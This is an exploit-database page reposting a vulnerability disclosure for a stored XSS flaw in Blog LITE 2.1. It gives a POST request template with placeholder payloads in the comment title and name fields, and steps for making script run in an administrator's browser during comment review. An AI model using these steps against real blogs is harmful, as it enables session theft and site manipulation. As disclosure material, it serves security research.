Advertisement






Blog LITE 2.1 - Stored XSS

CVE Category Price Severity
CVE-2020-1803 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-06-19
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060040

Below is a copy:

Blog LITE 2.1 - Stored XSS
Author   : CraCkEr
Website  : https://www.netartmedia.net/blog-lite
Vendor   : NetArt Media
Software : Blog LITE 2.1
Vuln Type: Stored XSS
Impact   : Manipulate the content of the site


Release Notes:

Allow Attacker to inject malicious code into website,
give ability to steal sensitive information,
manipulate data, and launch additional attacks.


Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Stored XSS

---------------------------------------------------------
POST /blog/index.php HTTP/2


-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"


-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"


-----------------------------401019026540470155022776857270


## Steps to Reproduce:

1. Visit Any Category on the Blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit

6. By default the Blog Disable your comment for Admin Check
7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)
8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)
9. XSS Will Fire and Executed on his Browser

[-] Done

 CraCkEr 2023

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.